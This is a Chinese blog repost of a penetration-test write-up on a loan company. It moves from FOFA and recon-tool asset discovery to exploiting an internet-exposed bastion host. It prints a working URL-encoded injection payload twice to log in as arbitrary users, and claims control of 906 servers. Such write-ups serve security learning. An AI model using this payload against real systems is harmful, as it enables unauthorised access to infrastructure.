记一次某贷款公司从0到100的渗透测试记录-安全小天地

前言
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。漏洞测试结束后已将漏洞提交漏洞平台。
一、信息收集
首先通过爱企查找到某某贷款公司，查看备案域名，进行子域名收集，以及fofa收集

图1-1 爱企查备案站点收集
将发现的域名可通过灯塔以及fofa进行收集，备案号也可进行收集遍历后面的号数
域名fofa语法:domain=xxx.com
备案号fofa语法：body=xxICP备xxxx号-x

图1-2 1-3 为fofa资产收集
灯塔收集：

图1-4 资产灯塔系统资产收集
这里推介使用灯塔进行收集，因为很多小的收集工具已经集成在灯塔里了，我们就不需要在去挨个下了，但是如果对方是有waf秒封的ip的话还是推介人工收集，方法就以上几种不多说了
二、漏洞发现
此时我们可以将收集的资产先放扫描器过一遍，扫描器扫的同时我们就手工测试对方系统的逻辑漏洞、cms漏洞、反序列化漏洞等等，这里呢我推介大家使用一个谷歌插件Wappalyzer,此插件的好处可以识别对方使用的cms系统以及用的编程语言、中间件、操作系统等，这样不仅免去了我们手工测试的麻烦还可以第一时间通过得到的上述信息精准打击

图2-1 Wappalyzer网站技术分析插件
通过收集和扫描将近三四个小时的努力发现了对方将堡垒机映射出外网，且该堡垒机在2021年4月通报过一个高危漏洞:任意用户登录，通过poc探测对方存在此漏洞
https://xxx.xxx.com:6443/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm

图2-2 poc测试图
三、漏洞利用
首先通过poc测试的漏洞来进行查看用户以及切换切换用户

图3-1 会话审计图
通过会话发现对方近期都有登录过堡垒机里的机器，此时尝试将审计用户切换为配置管理员查看对方的哪一个用户掌管机器的

图3-2 配置用户关联设备
通过图3-2知道了大量设备都于sys这个用户有关联，因此我们直接切换该用户进行查看
https://xxx.xxx.com:6443/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=sys

图 3-3 sys普通用户权限图
通过3-3可知已将对方打穿，可管控服务器906台，至此渗透结束
结束语
本文章主要讲解了从信息收集到漏洞发现以及利用的全过程，其实漏洞不止这一个但是此漏洞具有代表性，感谢各位师傅观看！

文字来源于- 火线 Zone-云安全社区，安全小天地只做文章分享，如有侵权，请联系站长删除

安全小天地的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。安全小天地拥有对此文章的修改、删除和解释权限，如转载或传播此文章，需保证文章的完整性，未经允许，禁止转载！本文所提供的工具仅用于学习，禁止用于其他，请在24小时内删除工具文件！！！访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客，即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail：anquanclub@foxmail.com

THE END